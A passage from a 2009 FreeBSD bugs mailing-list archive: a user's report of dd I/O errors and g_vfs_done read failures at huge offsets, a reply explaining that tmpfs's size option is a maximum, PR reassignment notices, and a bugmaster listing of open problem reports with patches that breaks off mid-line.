980bb1ba249fcff0136867bb8b461a3c Well now that's interesting and puzzling. Turns out that dd is failing with dd: file: Input/output error 144+0 records in 144+0 records out 150994944 bytes transferred in 1.816704 secs (83114773 bytes/sec) count 256 980bb1ba249fcff0136867bb8b461a3c dd: file: Input/output error 144+0 records in 144+0 records out 150994944 bytes transferred in 1.816477 secs (83125159 bytes/sec) count 1024 980bb1ba249fcff0136867bb8b461a3c and I'm seeing g_vfs_done():da1s1e[READ(offset=-6844985820815177728, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-7367456256827488256, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=7136992927258085376, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-6809018773487804416, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-9105783899823685632, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-8531636795393505280, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-1479149208900890624, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-6844985820815177728, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-7367456256827488256, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=7136992927258085376, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-6809018773487804416, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-9105783899823685632, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-8531636795393505280, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-1479149208900890624, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=110823770104102912, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-6844985820815177728, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-7367456256827488256, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=7136992927258085376, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-6809018773487804416, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-9105783899823685632, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-8531636795393505280, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-1479149208900890624, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=110823770104102912, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-6844985820815177728, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-7367456256827488256, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=7136992927258085376, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-6809018773487804416, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-9105783899823685632, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-8531636795393505280, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-1479149208900890624, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=110823770104102912, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-6844985820815177728, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-7367456256827488256, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=7136992927258085376, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-6809018773487804416, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-9105783899823685632, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-8531636795393505280, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-1479149208900890624, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=110823770104102912, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-6844985820815177728, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-7367456256827488256, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=7136992927258085376, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-6809018773487804416, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-9105783899823685632, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-8531636795393505280, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-1479149208900890624, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=110823770104102912, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-6844985820815177728, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-7367456256827488256, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=7136992927258085376, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-6809018773487804416, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-9105783899823685632, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-8531636795393505280, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=-1479149208900890624, length=16384)]error = 5 g_vfs_done():da1s1e[READ(offset=110823770104102912, length=16384)]error = 5 And... I'm guessing based on what I see that the "I/O error" is simply a ludicrous offset, but I could be wrong. My best guess is that there is something amiss on FreeBSD 7.*/amd64 relating to the filesystem code. It appears to be repeatable. Would anyone care to try? ... JG >Description: >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted: From owner-freebsd-bugs@FreeBSD.ORG Mon Jun 22 00:44:20 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id BF83F1065687; Mon, 22 Jun 2009 00:44:20 +0000 (UTC) (envelope-from linimon@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 93CFB8FC12; Mon, 22 Jun 2009 00:44:20 +0000 (UTC) (envelope-from linimon@FreeBSD.org) Received: from freefall.freebsd.org (linimon@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5M0iKU2002102; Mon, 22 Jun 2009 00:44:20 GMT (envelope-from linimon@freefall.freebsd.org) Received: (from linimon@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5M0iKGk002098; Mon, 22 Jun 2009 00:44:20 GMT (envelope-from linimon) Date: Mon, 22 Jun 2009 00:44:20 GMT Message-Id: <200906220044.n5M0iKGk002098@freefall.freebsd.org> To: linimon@FreeBSD.org, freebsd-bugs@FreeBSD.org, freebsd-geom@FreeBSD.org From: linimon@FreeBSD.org Cc: Subject: Re: kern/135898: [geom] Severe filesystem corruption - large files or large filesystems X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 22 Jun 2009 00:44:21 -0000 Old Synopsis: Severe filesystem corruption - large files or large filesystems New Synopsis: [geom] Severe filesystem corruption - large files or large filesystems Responsible-Changed-From-To: freebsd-bugs->freebsd-geom Responsible-Changed-By: linimon Responsible-Changed-When: Mon Jun 22 00:43:05 UTC 2009 Responsible-Changed-Why: I'm going to take a guess and assign this to the geom mailing list. http://www.freebsd.org/cgi/query-pr.cgi?pr=135898 From owner-freebsd-bugs@FreeBSD.ORG Mon Jun 22 01:55:47 2009 Return-Path: Delivered-To: freebsd-bugs@FreeBSD.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 1E74D106564A; Mon, 22 Jun 2009 01:55:47 +0000 (UTC) (envelope-from nhoyle@hoyletech.com) Received: from mout.perfora.net (mout.perfora.net [74.208.4.195]) by mx1.freebsd.org (Postfix) with ESMTP id DCFB18FC16; Mon, 22 Jun 2009 01:55:46 +0000 (UTC) (envelope-from nhoyle@hoyletech.com) Received: from [192.168.1.10] (pool-96-231-140-65.washdc.fios.verizon.net [96.231.140.65]) by mrelay.perfora.net (node=mrus0) with ESMTP (Nemesis) id 0MKp8S-1MIYYK1112-000g8S; Sun, 21 Jun 2009 21:42:37 -0400 Message-ID: <4A3EE185.9040205@hoyletech.com> Date: Mon, 22 Jun 2009 01:42:29 +0000 From: Nathanael Hoyle User-Agent: Thunderbird 2.0.0.21 (Windows/20090302) MIME-Version: 1.0 To: remko@FreeBSD.org References: <200906210945.n5L9jVOS009819@freefall.freebsd.org> In-Reply-To: <200906210945.n5L9jVOS009819@freefall.freebsd.org> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Provags-ID: V01U2FsdGVkX1/AM22FI3iviTgC4cvshlteL+u+LJWI4imv0W3 ge8EkJuwXi3mEVGIIIvnvo12Z+Ell3yLFsgqpJ/yiWPpSeahDS 8aGdW3To9bq01l8y91OoPYNTYFTFYci Cc: freebsd-fs@FreeBSD.org, mikej@paymentallianceintl.com, freebsd-bugs@FreeBSD.org Subject: Re: bin/135710: mount(8): mount -t tmpfs does not follow 'size' option X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 22 Jun 2009 01:55:47 -0000 remko@FreeBSD.org wrote: > Synopsis: mount(8): mount -t tmpfs does not follow 'size' option > > Responsible-Changed-From-To: freebsd-bugs->freebsd-fs > Responsible-Changed-By: remko > Responsible-Changed-When: Sun Jun 21 09:45:21 UTC 2009 > Responsible-Changed-Why: > reassign to fs team > > http://www.freebsd.org/cgi/query-pr.cgi?pr=135710 > _______________________________________________ > freebsd-fs@freebsd.org mailing list > http://lists.freebsd.org/mailman/listinfo/freebsd-fs > To unsubscribe, send any mail to "freebsd-fs-unsubscribe@freebsd.org" > Quoting Peter Snyder in "tmpfs: A Virtual Memory File System", in which he details the design for Solaris tmpfs, which served as the foundation for NetBSD's tmpfs, which was in turn integrated into FreeBSD: "Instead of allocating a fixed amount of memory for exclusive use as a file system, tmpfs file system size is dynamic depending on use, allowing the system to decide the optimal use of memory." And from the FreeBSD tmpfs(5) man page, "*size* - maximum size (in bytes) for the file system", note the use of the word "maximum" versus say, "initial". I would attempt to actually populate/fill the created file system, and unless it returns as being full with less than the size specified worth of data, I believe the behavior observed is as intended. -Nathanael From owner-freebsd-bugs@FreeBSD.ORG Mon Jun 22 11:08:44 2009 Return-Path: Delivered-To: freebsd-bugs@FreeBSD.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 6105D1065670 for ; Mon, 22 Jun 2009 11:08:44 +0000 (UTC) (envelope-from owner-bugmaster@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 4B70A8FC16 for ; Mon, 22 Jun 2009 11:08:44 +0000 (UTC) (envelope-from owner-bugmaster@FreeBSD.org) Received: from freefall.freebsd.org (localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5MB8icZ020074 for ; Mon, 22 Jun 2009 11:08:44 GMT (envelope-from owner-bugmaster@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5MB8hWl020070 for freebsd-bugs@FreeBSD.org; Mon, 22 Jun 2009 11:08:43 GMT (envelope-from owner-bugmaster@FreeBSD.org) Date: Mon, 22 Jun 2009 11:08:43 GMT Message-Id: <200906221108.n5MB8hWl020070@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: gnats set sender to owner-bugmaster@FreeBSD.org using -f From: FreeBSD bugmaster To: FreeBSD bugs list Cc: Subject: Current problem reports containing patches X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 22 Jun 2009 11:08:44 -0000 (Note: an HTML version of this report is available at http://people.freebsd.org/~linimon/studies/prs/prs_for_tag_patch.html .) S Tracker Resp. Description -------------------------------------------------------------------------------- f ports/135896 amdmi3 [PATCH] textproc/xerces-c2: mark MAKE_JOBS_UNSAFE o ports/135890 miwi [PATCH] archivers/xar: Take maintainership o ports/135888 miwi [PATCH] irc/xaric: Take maintainership o ports/135883 shaun [PATCH] lang/gcc295: Unbreak build o ports/135877 lbr [PATCH] databases/p5-DBIx-Class: update to 0.08107 o kern/135874 geom [geom] [patch] geom_linux_lvm misses newer fedora defa o ports/135868 araujo [PATCH] science/elmerpost: Fix problem with patch. o ports/135860 kde [PATCH] x11/kdebase3: Unbreak on -CURRENT o ports/135858 marcus [PATCH] ports-mgmt/portlint: Tweak existing features + o ports/135854 dhn [PATCH] lang/pnet: Update version to 0.8.0. Take maint o ports/135853 dhn [PATCH] lang/ml-pnet: update to 0.8.0 o ports/135852 mnag [PATCH] www/lighttpd: update to 1.4.23 o ports/135842 clsung [PATCH] sysutils/p5-mogilefs-server: update to 2.30 o ports/135841 clsung [PATCH] sysutils/p5-MogileFS-Utils: update to 2.14 o ports/135833 wxs [PATCH] lang/neko: update to 1.8.0 o ports/135821 skv [PATCH] www/p5-WWW-Yandex-TIC: update to 0.06 o ports/135818 skv [PATCH] www/p5-URI-ParseSearchString: update to 3.1 o ports/135817 skv [PATCH] www/p5-HTTP-DAV: update to 0.38 o ports/135816 chinsan [PATCH] www/p5-HTML-WikiConverter-MediaWiki: update to o ports/135815 chinsan [PATCH] www/p5-HTML-Seamstress: update to 5.0c o ports/135813 chinsan [PATCH] www/p5-HTML-Element-Library: update to 3.53 o ports/135812 tobez [PATCH] www/p5-Continuity: update to 1.01 o ports/135806 skv [PATCH] www/p5-Catalyst-Engine-HTTP-Prefork: update to f ports/135804 pgollucci [PATCH] www/p5-CGI-Application-Server: update to 0.061 f ports/135803 pgollucci [PATCH] www/p5-CGI-Application-Plugin-Stream: update t f ports/135802 pgollucci [PATCH] www/p5-CGI-Application-Plugin-DevPopup: update f ports/135801 pgollucci [PATCH] www/p5-CGI-Application-Plugin-AutoRunmode: upd f ports/135800 pgollucci [PATCH] www/p5-CGI-Application-Dispatch: update to 2.1 o ports/135798 skv [PATCH] textproc/p5-XML-NamespaceSupport: update to 1. o ports/135796 tobez [PATCH] textproc/p5-XML-Atom-SimpleFeed: update to 0.8 f ports/135792 pgollucci [PATCH] sysutils/p5-Sysadm-Install: update to 0.28 f ports/135787 pgollucci [PATCH] net/p5-Net-Write: update to 1.05 o ports/135784 lippe [PATCH] net/p5-Net-Google-AuthSub: update to 0.5 o ports/135783 tobez [PATCH] math/p5-Statistics-Descriptive: update to 3.00 o ports/135781 tobez [PATCH] mail/p5-Mail-Box: update to 2.090 o ports/135780 tobez [PATCH] mail/p5-Email-Send: update to 2.197 o ports/135779 tobez [PATCH] graphics/p5-URI-GoogleChart: update to 1.01 o ports/135776 chinsan [PATCH] finance/p5-Business-OnlinePayment-PaymenTech: o ports/135775 skv [PATCH] devel/p5-prefork: update to 1.03 o ports/135774 skv [PATCH] devel/p5-namespace-autoclean: update to 0.07 o ports/135771 lippe [PATCH] devel/p5-Test-YAML-Meta: update to 0.12 o ports/135769 timur [PATCH] devel/p5-Test-MockTime: update to 0.12 o ports/135767 tobez [PATCH] devel/p5-Set-Scalar: update to 1.24 o ports/135766 tobez [PATCH] devel/p5-Return-Value: update to 1.666001 o ports/135764 skv [PATCH] devel/p5-Parse-Method-Signatures: update to 1. o ports/135763 chinsan [PATCH] devel/p5-Params-Util: update to 1.00 o ports/135762 skv [PATCH] devel/p5-POE-Component-DirWatch: update to 0.2 o ports/135761 skv [PATCH] devel/p5-POE-API-Peek: update to 1.34 o ports/135759 skv [PATCH] devel/p5-MooseX-Types-Structured: update to 0. o ports/135756 chinsan [PATCH] devel/p5-MooseX-Storage: update to 0.18 o ports/135751 skv [PATCH] devel/p5-Inline: update to 0.45 o ports/135750 skv [PATCH] devel/p5-IO: update to 1.25 o ports/135749 timur [PATCH] devel/p5-File-ExtAttr: update to 1.09 o ports/135748 skv [PATCH] devel/p5-Devel-PartialDump: update to 0.08 o ports/135746 skv [PATCH] devel/p5-Devel-Declare: update to 0.005006 o ports/135745 timur [PATCH] devel/p5-DateTime-Format-Natural: update to 0. o ports/135743 skv [PATCH] devel/p5-Data-UUID: update to 1.202 f ports/135736 pgollucci [PATCH] devel/p5-Class-Gomor: update to 1.02 o ports/135735 skv [PATCH] devel/p5-Cache-FastMmap: update to 1.30 o ports/135734 tobez [PATCH] devel/p5-Badger: update to 0.06 o ports/135733 skv [PATCH] devel/p5-B-Hooks-OP-Check: update to 0.17 o ports/135727 tobez [PATCH] databases/p5-DBIx-Perlish: update to 0.53 o ports/135724 skv [PATCH] databases/p5-DBD-mysql: update to 4.011 o ports/135723 tobez [PATCH] databases/p5-Cache-Memcached-Fast: update to 0 o ports/135722 skv [PATCH] converters/p5-Convert-Binary-C: update to 0.74 o ports/135720 mat [PATCH] devel/perltidy: update to 20090616 f ports/135719 [patch] multimedia/mplayer: Fix segfaults when playing o bin/135718 [patch] enhance qsort(3) to properly handle 32-bit ali f ports/135707 miwi [PATCH] net/tcpillust: update to 2.01, unbreak on 8-CU o bin/135700 [patch] Add an ability to run inetd(8) with P_PROTECTE o ports/135696 mm [PATCH] irc/tr-ircd: unbreak on 8-CURRENT f ports/135694 [PATCH] palm/pilot-link: Unbreak on 8-CURRENT o ports/135681 novel [patch] security/gnutls-devel update to 2.9.1 o ports/135680 novel [patch] security/gnutls update to 2.8.1 o ports/135679 novel [patch] security/libtasn1 update to 2.2 o ports/135674 portmgr [PATCH] some PHP-related knobs should be placed before o ports/135670 ale [PATCH] databases/mysql50-server: in mysql-client mysq o ports/135664 [PATCH]: bsd.ldap.mk: Detect flavour of installed open o ports/135663 portmgr [PATCH]: bsd.port.mk: move pkg_install commands detect o ports/135652 [PATCH] www/gforge: Removed BROKEN. Take maintainershi o ports/135649 portmgr Mk/bsd.port.mk: [patch], fix documentation relating to p kern/135628 remko [umass] [patch] add a device quirk for Myson Heden 881 f ports/135624 wxs [PATCH] ports/security/tor-devel f ports/135621 wxs [PATCH] ports/sysutils/fusefs-kmod o kern/135608 [patch] sysctl should be able to handle byte values f ports/135603 pgollucci [PATCH] www/campsite: apache@ cleanups f ports/135602 pgollucci [PATCH] graphics/mapserver: USE_APACHE=yes is deprecat o usb/135575 usb [usbdevs] [patch] Add HTC Wizard phone vid/pid informa o bin/135565 randi [patch] a patch for sysinstall(8) to look at UFS parti f ports/135553 pgollucci [PATCH] www/websh: Mark MAKE_JOBS_UNSAFE=yes f ports/135552 pgollucci [PATCH] www/woadaptor: Mark MAKE_JOBS_UNSAFE=yes s ports/135544 [patch]net-im/qwit suffers from twitpocalypse f ports/135541 [PATCH] math/p5-NetCDF cannot load module with netcdf- f ports/135538 pgollucci [PATCH] textproc/xerces-c2-devel: Mark MAKE_JOBS_UNSAF o ports/135536 chinsan [PATCH] net/xmlrpc-c: Mark MAKE_JOBS_UNSAFE=yes o docs/135520 doc [patch] typos in fail(9) o ports/135500 obrien net/rdesktop sound does not work [PATCH] o kern/135485 [modules] [patch] During a shutdown, kernel modules sh o docs/135475 doc [patch] jot(1) manpage and behaviour differ o ports/135474 ale [PATCH] Mk/bsd.php.mk: add possibility to redefine PHP o ports/135471 secteam [patch] ports-mgmt/portaudit-db packaudit.conf sourced o threa/135462 threads [PATCH] _thread_cleanupspecific() doesn't handle delet o ports/135460 danfe [PATCH] astro/stellarium: update to 0.10.2 o ports/135441 cjh [PATCH] korean/ko-hanterm: fix for NOPORTDOCS f ports/135425 skreuzer [PATCH] sysutils/nvclock: update to 0.8b4 p bin/135417 brian [patch] man(1): man -k overrides $PATH for $PAGER o ports/135397 lev [PATCH] devel/subversion: devel/apr WITH_BDB related c f ports/135394 amdmi3 [PATCH] graphics/gdal: mark MAKE_JOBS_UNSAFE f ports/135370 skreuzer [PATCH] devel/pstreams: Fix Custom Prefix mtree issue f ports/135369 skreuzer [PATCH] audio/tuneradio: Fix Custom Prefix mtree issue o bin/135349 acpi [patch] teach acpidump(8) to disassemble arbitrary mem o ports/135341 emulation [PATCH] linux-f10 ports that install manpages: add NOM o ports/135337 emulation [PATCH] emulators/linux_base-f10: incorrect bash usage o ports/135330 lippe [PATCH] devel/st: return back missed file into library o ports/135323 beech [PATCH] ftp/proftpd giving up on fetching files: mod_c o ports/135303 alepulver [PATCH] games/warzone2100: update to 2.2.0 p misc/135301 remko [tinybsd] [patch] Patch for fix architecture support f f ports/135285 wxs [PATCH] sysutils/fusefs-kmod: Fix build on current o ports/135272 olgeni [PATCH] devel/esdl: update to 1.0.1 o ports/135238 multimedia [patch] OPTIONS support in multimedia/transcode o docs/135165 doc [patch] make(1) fixes: punctuation, typos, tweaks o bin/135159 [patch] pkg_delete(1) segfaults on empty @pkgdep lines f ports/135157 dinoex [PATCH] print/cups: broken metaport does not install o ports/135095 marcus [patch] ports-mgmt/portlint should check for a.out fil o ports/135092 mm [PATCH]:lang/tcl85 -- add missing file to plist for WI o ports/135085 itetcu [PATCH] port:mail/altermime update to 0.3.10 o ports/135076 skv [patch] Update www/google-sitemapgen to 1.5 o kern/135070 acpi [acpi] [patch] BIOS resource allocation and FreeBSD AC o kern/135067 net [patch] [fib] Incorrect KASSERTs in sys/net/route.c o kern/135057 [ata] [patch] New VIA SATA controller are not getting o ports/135055 mat [PATCH] devel/p5-DateTime-TimeZone: update to 0.91 p usb/135009 weongyo [uath] [patch] Accton ar5523 products not in "uath" dr o bin/134975 ipfw [patch] ipfw(8) can't work with set in rule file. o ports/134952 perl [patch] security/p5-Net-SSLeay build shouldn't need in o ports/134946 alexbl [PATCH] textproc/highlight: update to 2.9 o misc/134920 [patch] Large upgrades from source cause compile error o bin/134919 [patch] add information to truss(1) when tracing linux o kern/134878 [puc] [patch] Add support for Oxford OXPCIe954 and OXP o ports/134874 alepulver [patch] Port fix games/iourbanterror on amd64 o amd64/134786 amd64 [vfs] [patch] vfs.bufspace sysctl wideness on amd64 o ports/134785 novel [patch][vuxml] security/gnutls: update to 2.6.6 and do f ports/134773 openoffice [patch] editors/openoffice.org-3 reduce depenedencies o conf/134660 rc [patch] rc-script for initializing ng_netflow+ng_ipfw o ports/134650 beech [patch] net/x11vnc fix build for option WITHOUT_NLS o ports/134647 glewis [patch] java/jdk16 reduce depenedencies on cups-base o ports/134643 x11 [patch] x11-servers/xorg-server - Unbreak Xorg 7.4 ser o ports/134632 kwm [patch] Update port: multimedia/ffmpeg 2009-05-15 o usb/134631 usb [usbdevs] [patch] WiSPY DBx support requires usb tweak o gnu/134604 [gcclibs] [patch] Memory leak in gcclibs/libgomp f ports/134594 lwhsu [PATCH] security/pwman3: use cElementTree and sqlite c o kern/134590 [libi386] [gpt] [patch] Bootloader support for hybrid o i386/134586 jhb [i386] [patch] Incorrect machine check exception handl o ports/134543 philip [patch] games/wesnoth: update to 1.6.2 f ports/134537 miwi misc/e2fsprogs-libuuid closes too manu descriptors [pa f ports/134536 gnome [patch] graphics/gimp: Gimp 2.6.6 fails to open URI's f ports/134535 miwi sysutils/e2fsprogs uuidd is broken [patch] o ports/134534 beech [PATCH] net/skype12, remove IGNORE s kern/134517 yongari [rl] [patch] Realtek 8111C Driver Backport for FreeBSD o ports/134515 shaun [PATCH] www/kannel: unbreak kannel on sparc64 o ports/134514 perky [PATCH] devel/libsigsegv: unbreak on sparc64 o kern/134513 [libc] [patch] fts(3) FTS_NOCHDIR misbehavior with emp o ports/134501 mat [PATCH] devel/p5-DateTime: update to 0.50 o ports/134498 skv [PATCH] devel/p5-Class-Accessor: update to 0.33 o ports/134397 lme [patch] games/scummvm update o arm/134368 arm [patch] nslu2_led driver for the LEDs on the NSLU2 o arm/134338 arm [patch] Lock GPIO accesses on ixp425 o ports/134273 multimedia [patch] multimedia/ffmpeg - avoid crash in multimedia/ o ports/134256 mm [patch] net-im/mu-conference. Unbreak build with mysql o kern/134249 [libiconv] [patch] ignore case for character set names o i386/134242 i386 [boot0] [patch] improvement i386 boot0 error diagnose o ports/134239 python [patch] rc script for net-p2p/py-bittornado o kern/134225 [libexec] [patch] Reduce disk write load from save-ent o ports/134214 chinsan [PATCH] devel/p5-List-Rotation-Cycle: update to 1.009 o ports/134166 skv [PATCH] devel/p5-prefork: update to 1.03 o docs/134127 doc [patch] ip6(4) manual does not contain proper referenc o usb/134117 usb [Patch] Add support for 'Option GlobeTrotter HSDPA Mod o ports/134109 lme [PATCH] multimedia/devede: Fix Python Psyco support o arm/134092 arm [patch] NSLU.hints contains wrong hints for on board n o docs/134074 doc [patch] locking.9 man page slight enhancements o ports/134071 danfe [patch] Port update to games/nexuiz 2.5 o bin/134069 [patch] mount_nfs(8) option parsing bug p docs/134053 danger [patch] arp(8) manpage should mention ndp(8) in See Al o bin/134038 dougb [patch] mergemaster(8): preserve mode/ownership for ex o kern/134010 [gssapi][patch] Buffer overflow and use-after-free in o conf/134006 rc [patch] Unload console screensaver kernel modules if s o ports/133996 flz [PATCH] mail/gnome-gmail-notifier: migrate to devel/li o ports/133946 x11 x11-servers/xorg-server [patch] X crashes in xinerama o bin/133907 [patch] cp(1) wrongly reports errors in vacuous copy o ports/133897 fjoe [patch] devel/cvsnt add depends for libxm2 o conf/133890 rc [patch] sshd(8): add multiple profiles to the rc.d scr o bin/133860 [patch] lorder(1) misses symbols defined in read only o bin/133834 [patch] chat(1): terminate()/fatal() infinity mutual r o ports/133815 portmgr [PATCH] bsd.port.mk: implements fakeroot for the ports o kern/133786 [netinet] [patch] ip_input might cause kernel panic o kern/133776 [libc] [patch] snprintf(3) and vsnprintf(3) do not pro o kern/133775 [patch] gdb(1) debugscripts: fix proc address print in s kern/133733 [pci] [patch] Incorrect record in pci_vendors for Broa o conf/133715 [terminfo] [patch] no terminfo for rxvt-unicode termin f usb/133712 gavin [ural] [patch] RE: Fixed an issue with ural(4) that wa o ports/133663 skv [PATCH] devel/p5-POE: update to 1.0040 o ports/133641 doceng [PATCH] print/ghostscript7 crash bug p amd64/133592 kib [busdma] [patch] busdma incorrectly calculates bounce o docs/133567 doc [patch] doc/Makefile switch to csup f ports/133533 pgollucci [PATCH] Add a static user/group for audio/musicpd port o kern/133491 [libfetch] [patch] Digest HTTP authentication support o ports/133457 eclipse [PATCH] java/eclipse-webtools: update to 3.0.3 o ports/133430 oliver [patch] multimedia/audacious 1.5.1: file dialog opens o ports/133423 eclipse [PATCH] java/eclipse-emf: Update to 2.4.1 o ports/133417 eclipse [PATCH] java/eclipse-gef: update to 3.4.1 o ports/133413 mich [patch] sysutils/libcdio 0.78.2 is broken for CDROMs t o ports/133291 nork [PATCH] graphics/ilmbase: produces library not linked p bin/133255 stefanf [PATCH] sh(1): empty line in eval resets $? o ports/133250 cy [PATCH] sysutils/screen: remove NO_PACKAGE. o kern/133239 [ae] [jme] [patch] if_jme can assign duplicate MAC add o kern/133235 net [netinet] [patch] Process SIOCDLIFADDR command incorre o bin/133227 [patch] whois(1): add support for SLD whois server loo o ports/133175 x11 [patch] x11/pixman: enable SSE2 support autodetection o kern/133174 fs [msdosfs] [patch] msdosfs must support utf-encoded int o kern/133162 [NOTES] [patch] document modular ata driver devices o ports/133146 ahze [patch] x11-fonts/dejavu: install fontconfig configura o docs/133118 doc [patch] Error in getopt (1) manual EXAMPLES section o docs/133110 doc [patch] Typo corrections for /usr/src/UPDATING o ports/133098 mbr [patch] mail/up-imapproxy hardcoded to use /etc/imappr o ports/133078 kde [PATCH] kmix (multimedia/kdemultimedia4) incorrectly b f ports/133072 jpaetzel [patch] net/isc-dhcp30-server, net/isc-dhcp30-server: o bin/132993 [patch] bsnmpd(1) - bad IfPoll timer interval o ports/132952 obrien [patch] lang/pcc update o ports/132881 girgen [PATCH] www/jakarta-jmeter: update to 2.3.2 o conf/132851 net [fib] [patch] allow to setup fib for service running f o bin/132847 syrinx [patch] bsnmpd(8): snmp_pf: add support for retrieving o bin/132845 geom [geom] [patch] ggated(8) does not close files opened a o docs/132839 doc [patch] Fix example script in ldap-auth article p docs/132834 trhodes [patch] Punctuation inconsistency in chgrp.1 and cut.1 o kern/132832 net [netinet] [patch] tcp_output() might generate invalid p usb/132799 usb [usb][patch]GENESYS USB2IDE requires NO_SYNCHRONIZE_CA o bin/132798 net [patch] ggatec(8): ggated/ggatec connection slowdown p o usb/132785 usb [usb] [patch] Gemtech remote powersocket is classed as o kern/132705 net [libwrap] [patch] libwrap - infinite loop if hosts.all o ports/132693 sobomax [PATCH] misc/libpri: update to 1.4.9 o bin/132692 [patch] getent(1): no support for netgroup o ports/132688 sobomax [PATCH] net/asterisk: update to 1.4.23.2 o kern/132622 philip [glxsb] [patch] glxsb(4) performs badly with ipsec o bin/132591 [patch] dump(8): "dump W" uses %c instead of %d for re o ports/132588 ahze [PATCH] www/midori: update to 0.1.4 f ports/132579 cy [patch] sysutils/screen: fix build with externel compi o ports/132573 ume [patch] security/cyrus-sasl2: fix compilation with gcc p docs/132546 trhodes [patch] sync vm_map_lock(9) with recent locking change o docs/132525 doc [PATCH] Fix documentation for atapicam(4) and umass(4) o kern/132497 rwatson [boot] [patch] Stale pre-5.x mbuf references in new Bo o conf/132483 rc rc.subr(8) [patch] setfib(1) support for rc.subr o conf/132476 rc [rc.d] [patch] add support setfib(1) in rc.d/routing o ports/132435 anders [patch] audio/xmp: add option to use tar(1) instead of p docs/132392 trhodes [PATCH] remove leftovers of libkse from pthread.3 o bin/132367 [patch] less(1)/more(1) fchmod(2) `/dev/null' to 0600 o ports/132352 gahr [patch] databases/mysql-gui-tools hangs when picking s o www/132344 bugmeister [patch] www/en/cgi/query-pr.cgi broken base64 attachme s ports/132319 lwhsu [PATCH] chinese/scim-chewing: update to 0.3.3 s ports/132318 lwhsu [PATCH] chinese/libchewing: update to 0.3.2 o docs/132311 doc [patch] 